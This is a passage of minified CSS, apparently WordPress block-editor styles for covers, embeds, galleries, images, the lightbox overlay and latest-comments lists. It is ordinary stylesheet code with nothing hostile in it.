a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-left:0;text-align:left}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-right:0;text-align:right}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){color:inherit}body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__image-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__video-background{z-index:0}body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__gradient-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)).has-background-dim:not(.has-background-gradient):before{z-index:1}.has-modal-open body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container{z-index:auto}.wp-block-details{box-sizing:border-box}.wp-block-details summary{cursor:pointer}.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file *+.wp-block-file__button{margin-left:.75em}:where(.wp-block-file){margin-bottom:1.5em}.wp-block-file__embed{margin-bottom:1em}:where(.wp-block-file__button){border-radius:2em;display:inline-block;padding:.5em 1em}:where(.wp-block-file__button):where(a):active,:where(.wp-block-file__button):where(a):focus,:where(.wp-block-file__button):where(a):hover,:where(.wp-block-file__button):where(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}.wp-block-form-input__label{display:flex;flex-direction:column;gap:.25em;margin-bottom:.5em;width:100%}.wp-block-form-input__label.is-label-inline{align-items:center;flex-direction:row;gap:.5em}.wp-block-form-input__label.is-label-inline .wp-block-form-input__label-content{margin-bottom:.5em}.wp-block-form-input__label:has(input[type=checkbox]){flex-direction:row;width:fit-content}.wp-block-form-input__label:has(input[type=checkbox]) .wp-block-form-input__label-content{margin:0}.wp-block-form-input__label:has(.wp-block-form-input__label-content+input[type=checkbox]){flex-direction:row-reverse}.wp-block-form-input__label-content{width:fit-content}:where(.wp-block-form-input__input){font-size:1em;margin-bottom:.5em;padding:0 .5em}:where(.wp-block-form-input__input)[type=date],:where(.wp-block-form-input__input)[type=datetime-local],:where(.wp-block-form-input__input)[type=datetime],:where(.wp-block-form-input__input)[type=email],:where(.wp-block-form-input__input)[type=month],:where(.wp-block-form-input__input)[type=number],:where(.wp-block-form-input__input)[type=password],:where(.wp-block-form-input__input)[type=search],:where(.wp-block-form-input__input)[type=tel],:where(.wp-block-form-input__input)[type=text],:where(.wp-block-form-input__input)[type=time],:where(.wp-block-form-input__input)[type=url],:where(.wp-block-form-input__input)[type=week]{border-style:solid;border-width:1px;line-height:2;min-height:2em}textarea.wp-block-form-input__input{min-height:10em}.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 1em 1em 0;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-right:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,#000000b3,#0000004d 70%,#0000);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-right:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{margin-right:1em;width:calc(33.33333% - .66667em)}.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{margin-right:1em;width:calc(25% - .75em)}.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{margin-right:1em;width:calc(20% - .8em)}.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{margin-right:1em;width:calc(16.66667% - .83333em)}.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{margin-right:1em;width:calc(14.28571% - .85714em)}.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{margin-right:1em;width:calc(12.5% - .875em)}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){margin-right:0}}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{margin-right:0}.blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{max-width:420px;width:100%}.blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{justify-content:center}.wp-block-gallery:not(.is-cropped) .blocks-gallery-item{align-self:flex-start}figure.wp-block-gallery.has-nested-images{align-items:normal}.wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){margin:0;width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2)}.wp-block-gallery.has-nested-images figure.wp-block-image{box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;justify-content:center;max-width:100%;position:relative}.wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{flex-direction:column;flex-grow:1;margin:0}.wp-block-gallery.has-nested-images figure.wp-block-image img{display:block;height:auto;max-width:100%!important;width:auto}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{bottom:0;left:0;max-height:100%;position:absolute;right:0}.wp-block-gallery.has-nested-images figure.wp-block-image:has(figcaption):before{backdrop-filter:blur(3px);content:"";height:100%;-webkit-mask-image:linear-gradient(0deg,#000 20%,#0000);mask-image:linear-gradient(0deg,#000 20%,#0000);max-height:40%;pointer-events:none}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{box-sizing:border-box;color:#fff;font-size:13px;margin:0;overflow:auto;padding:1em;text-align:center;text-shadow:0 0 1.5px #000}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar{height:12px;width:12px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-track{background-color:initial}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus::-webkit-scrollbar-thumb,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover::-webkit-scrollbar-thumb{background-color:#fffc}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:focus-within,.wp-block-gallery.has-nested-images figure.wp-block-image figcaption:hover{scrollbar-color:#fffc #0000}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{will-change:transform}@media (hover:none){.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{scrollbar-color:#fffc #0000}}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption{background:linear-gradient(0deg,#0006,#0000)}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{display:inline}.wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{color:inherit}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{flex:1 1 auto}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{background:none;color:inherit;flex:initial;margin:0;padding:10px 10px 9px;position:relative;text-shadow:none}.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border:before,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded:before{content:none}.wp-block-gallery.has-nested-images figcaption{flex-basis:100%;flex-grow:1;text-align:center}.wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-bottom:auto;margin-top:0}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){display:flex}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{flex:1 0 0%;height:100%;object-fit:cover;width:100%}.wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){width:100%}@media (min-width:600px){.wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75)}.wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8)}.wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333)}.wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714)}.wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5)}.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{width:100%}}.wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{max-width:420px;width:100%}.wp-block-gallery.has-nested-images.aligncenter{justify-content:center}.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-layout-constrained){position:relative}h1:where(.wp-block-heading).has-background,h2:where(.wp-block-heading).has-background,h3:where(.wp-block-heading).has-background,h4:where(.wp-block-heading).has-background,h5:where(.wp-block-heading).has-background,h6:where(.wp-block-heading).has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}.wp-block-image>a,.wp-block-image>figure>a{display:inline-block}.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}@media not (prefers-reduced-motion){.wp-block-image img.hide{visibility:hidden}.wp-block-image img.show{animation:show-content-image .4s}}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull>a,.wp-block-image.alignwide>a{width:100%}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,');mask-image:url('data:image/svg+xml;utf8,');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){border-radius:9999px}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;backdrop-filter:blur(16px) saturate(180%);background-color:#5a5a5a40;border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;opacity:0;padding:0;position:absolute;right:16px;text-align:center;top:16px;width:20px;z-index:100}@media not (prefers-reduced-motion){.wp-lightbox-container button{transition:opacity .2s ease}}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40;outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:#5a5a5a40;border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;left:0;overflow:hidden;position:fixed;top:0;visibility:hidden;width:100%;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;min-height:40px;min-width:40px;padding:0;position:absolute;right:calc(env(safe-area-inset-right) + 16px);top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);left:50%;overflow:hidden;position:absolute;top:50%;transform:translate(-50%,-50%);transform-origin:top left;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:0 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{visibility:visible}@media not (prefers-reduced-motion){.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active) img{animation:turn-off-visibility .25s both}.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes show-content-image{0%{visibility:hidden}99%{visibility:hidden}to{visibility:visible}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(-50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(-50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}ol.wp-block-latest-comments{box-sizing:border-box;margin-left:0}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment)){line-height:1.1}:where(.wp-block-latest-comments:not([style*=line-height] .wp-block-latest-comments__comment-excerpt p)){line-height:1.8}.has-dates :where(.wp-block-latest-comments:not([style*=line-height])),.has-excerpts :where(.wp-block-latest-comments:not([style*=line-height])){line-height:1.5}.wp-block-latest-comments .wp-block-latest-comments{padding-left:0}.wp-block-latest-comments__comment{list-style:none;margin-bottom:1em}.has-avatars .wp-block-latest-comments__comment{list-style:none;min-height:2.25em}.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-excerpt,.has-avatars .wp-block-latest-comments__comment .wp-block-latest-comments__comment-meta{margin-left:3.25em}.wp-block-latest-comments__comment-excerpt p{font-size:.875em;margin:.36em 0 1.4em}.wp-block-latest-comments__comment-date{display:block;font-size:.75em}.wp-block-latest-comments .avatar,.wp-block-latest-comments__comment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] 